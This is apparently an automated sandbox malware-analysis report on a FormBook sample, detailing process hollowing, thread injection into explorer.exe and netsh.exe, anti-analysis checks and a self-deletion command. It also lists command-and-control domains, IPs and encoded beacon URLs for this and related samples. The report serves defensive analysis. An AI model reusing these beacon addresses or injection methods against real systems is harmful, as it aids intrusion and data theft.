          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]12_2_037C2D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C2D8A mov eax, dword ptr fs:[00000030h]12_2_037C2D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]12_2_037F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]12_2_037F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]12_2_037F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F2581 mov eax, dword ptr fs:[00000030h]12_2_037F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E746D mov eax, dword ptr fs:[00000030h]12_2_037E746D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FA44B mov eax, dword ptr fs:[00000030h]12_2_037FA44B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00409B40 LdrLoadDll,2_2_00409B40
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 142.252.22.166 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.94.210.101 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.dragonmodz.net
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.blueprintroslyn.com
          Source: C:\Windows\explorer.exeDomain query: www.qzttb.net
          Source: C:\Windows\explorer.exeDomain query: www.royaldears.com
          Source: C:\Windows\explorer.exeDomain query: www.pittsburghdata.center
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9E0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeProcess created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"Jump to behavior
          Source: explorer.exe, 00000005.00000000.362125482.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.367609334.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.404234223.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.381883157.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.396756364.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.358182276.00000000008B8000.00000004.00000020.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.397268881.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.359004120.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.382144859.0000000000EE0000.00000002.00020000.sdmp, netsh.exe, 0000000C.00000002.614807797.0000000005D30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Uses netsh to modify the Windows network and firewall settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528618 Sample: cK1g5gckZR9VHjj.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 30 www.pittsburghdata.center 2->30 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 5 other signatures 2->44 11 cK1g5gckZR9VHjj.exe 3 2->11         started        signatures3 process4 signatures5 58 Tries to detect virtualization through RDTSC time measurements 11->58 14 cK1g5gckZR9VHjj.exe 11->14         started        17 cK1g5gckZR9VHjj.exe 11->17         started        process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 19 explorer.exe 14->19 injected process8 dnsIp9 32 www.qzttb.net 154.94.210.101, 49779, 80 ROOTNETWORKSUS Seychelles 19->32 34 www.dragonmodz.net 142.252.22.166, 49821, 80 EGIHOSTINGUS United States 19->34 36 3 other IPs or domains 19->36 46 System process connects to network (likely due to code injection or exploit) 19->46 48 Uses netsh to modify the Windows network and firewall settings 19->48 23 netsh.exe 19->23         started        signatures10 process11 signatures12 50 Self deletion via cmd delete 23->50 52 Modifies the context of a thread in another process (thread injection) 23->52 54 Maps a DLL or memory area into another process 23->54 56 Tries to detect virtualization through RDTSC time measurements 23->56 26 cmd.exe 1 23->26         started        process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.dragonmodz.net/udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd0%Avira URL Cloudsafe
          http://www.qzttb.net/udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd0%Avira URL Cloudsafe
          http://www.royaldears.com/udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd0%Avira URL Cloudsafe
          www.spoiledzone.com/udeh/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.qzttb.net
          		154.94.210.101
          		truetrue
            		unknown
            www.royaldears.com
            		3.64.163.50
            		truetrue
              		unknown
              www.dragonmodz.net
              		142.252.22.166
              		truetrue
                		unknown
                www.pittsburghdata.center
                		209.17.116.163
                		truetrue
                  		unknown
                  www.blueprintroslyn.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.dragonmodz.net/udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrdtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.qzttb.net/udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrdtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.royaldears.com/udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrdtrue
                    • Avira URL Cloud: safe
                    		unknown
                    www.spoiledzone.com/udeh/true
                    • Avira URL Cloud: safe
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.381972183.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.396876565.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpfalse
                        		high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        142.252.22.166
                        		www.dragonmodz.netUnited States
                        		18779EGIHOSTINGUStrue
                        154.94.210.101
                        		www.qzttb.netSeychelles
                        		32708ROOTNETWORKSUStrue
                        3.64.163.50
                        		www.royaldears.comUnited States
                        		16509AMAZON-02UStrue
                        209.17.116.163
                        		www.pittsburghdata.centerUnited States
                        		55002DEFENSE-NETUStrue

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:528618
                        Start date:25.11.2021
                        Start time:15:09:16
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 33s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:cK1g5gckZR9VHjj.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:24
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@9/1@7/4
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 13.9% (good quality ratio 12.4%)
                        • Quality average: 72.5%
                        • Quality standard deviation: 32.1%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 127
                        • Number of non-executed functions: 151
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 51.104.136.2, 51.11.168.232, 131.253.33.200, 13.107.22.200
                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528618/sample/cK1g5gckZR9VHjj.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        15:10:15API Interceptor27x Sleep call for process: cK1g5gckZR9VHjj.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        3.64.163.50Nuevo Pedido.exeGet hashmaliciousBrowse
                        • www.rcepjobs.com/udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN
                        Zr26f1rL6r.exeGet hashmaliciousBrowse
                        • www.inklusion.online/n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z
                        xDG1WDcI0o.exeGet hashmaliciousBrowse
                        • www.warriorsouls.com/imnt/?w4=173jVSvDSoGUE2AW1ivoK5ykCyKPADg/LonPGNHNCQX2BYegbwJ7vTJYHkxtjawzsEfN&nHNxLR=Q48l
                        Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                        • www.evaccines.com/s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP
                        Xl1gbEIo0b.exeGet hashmaliciousBrowse
                        • www.teachermeta.com/btn2/?nRk=QvINNIMzsRYf/0qmivF6Dmovk+WpXAaZUAI4egrxWGuGQnhzgyC+G4dLS9x+/CyjCjh9&sFN0Yx=JL0hlxBhSB
                        Rev_NN doccument.docGet hashmaliciousBrowse
                        • www.brettneoheroes.com/e6b3/
                        202111161629639000582.exeGet hashmaliciousBrowse
                        • www.sketchnfts.com/wkgp/?4h5=jdmv8BZZ/B46r0we2YWB0KZ3uGSoSKuz6a4pN1QKcZ2F8xRxcAMtTOc/gzvsbCezLg9G&2dX=P6APITtHDX2tmpK
                        Ez6r9fZIXc.exeGet hashmaliciousBrowse
                        • www.battlegroundxr.com/ad6n/?G8a0vHm=ZcTQfm3E3Bis9O+U1J+3C+jUHMxN8jyTuxkjib6Q0pkS+Pn4CLfVing+78WMbf+swImY&6lrHq=5jktfN6hH6
                        New Order INQ211118.exeGet hashmaliciousBrowse
                        • www.cleversights.com/ng6c/?JBGdjn1=EPV2/NoACT8dHOR9v1gyCHceGsyPjrlJM+UK8aQEskssrzMl224UALhiEE2fgJmZ+elx&8pB8=1bqLQxdXG
                        Quote.exeGet hashmaliciousBrowse
                        • www.sandspringsramblers.com/g2fg/?1btd=IfCDV&CTEp9H=ge+LGbGWprSeotpzV0+Q+kydhBjB2swQkk5yFtO6ceAAyVR8yEXyjgFWO6AISkVeqI4m
                        111821 New Order_xlxs.exeGet hashmaliciousBrowse
                        • www.methodicalservices.com/oae0/?UDKtfT=0pSD8r20Ixf8_&9rGxtBkx=0YzjOyVp+Yb6xacNTkTkmGCYCJkm2COrsGtOu7+4k+P6CiNE0Q3WT0+8/3B2OogfveoZ
                        rEC0x536o5.exeGet hashmaliciousBrowse
                        • www.evaccines.com/s3f1/?XZeT=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&_dIpGp=dTiPIlmXgVLtX
                        Booking Confirmation 548464656_pdf.exeGet hashmaliciousBrowse
                        • www.metaversealive.com/cfb2/?4hGdfRT=Agu3xtL1ZQO5CFfrtHOGjgVP3skWkN/ViqH4UJ4za8OjNS089a88X4B7IihWeXraBDmd&2dM4Gf=e4hhCbFxvtz0ztm
                        Purchase Order Ref No_ Q51100732.xlsxGet hashmaliciousBrowse
                        • www.fondoflouisville.com/dyh6/?NL0hl=kQyzM0Wln+3leUBi0Wmn3eENdAam7BCJPPELL5jXxpKBYvrw3jMhvOGuqF2XIvtdQ71vEA==&v2M=r0DdC04HWpDX
                        AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                        • www.inklusion.online/n8ds/?9rJT=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&at=WtR4GZm
                        order-2021-PO.Pdf.exeGet hashmaliciousBrowse
                        • www.godrejs-windsor.com/vocn/?5jYXyzb=pnlTJGUzE5gMj2POSUsxOYM9XX/o1stqBdRTzx6fWnpbF/A27HO5FUQYdB9AbrLCdWzy&IL08W8=d6AXkVBHUjyXZ
                        Inquiry Sheet.docGet hashmaliciousBrowse
                        • www.babehairboutique.com/cy88/?7nLpW=-ZKlyLs0ebYdGfJ&QZ=K8MP/gXd9fA79gQ3nARZg5fl4N3QoqdUhkC4TU9uNhwqyFbAVwd8tffptZPcvcemife8Lg==
                        PO-No 243563746 Sorg.exeGet hashmaliciousBrowse
                        • www.webmakers.xyz/seqa/?tvv=ihZT8RaXnH5DP6&R48TL=PArQXewhCLQ/aGYQG57zH1nhkqDi1nj517XyI5njozHkI0sb3Vjromuzr7tZwLe6Yf/2
                        ORDER REMINDER.docGet hashmaliciousBrowse
                        • www.quetaylor.com/zaip/?r2JPlFDH=HAqh6cOe6LTcTwCBF16MZHaJ4csidjMHsZ2CzJlUzLX8i4OfANm4LybqNg7cEAPcNuVe8g==&Ozu8Z=qxoHsxEPs4u
                        Order Specification.docGet hashmaliciousBrowse
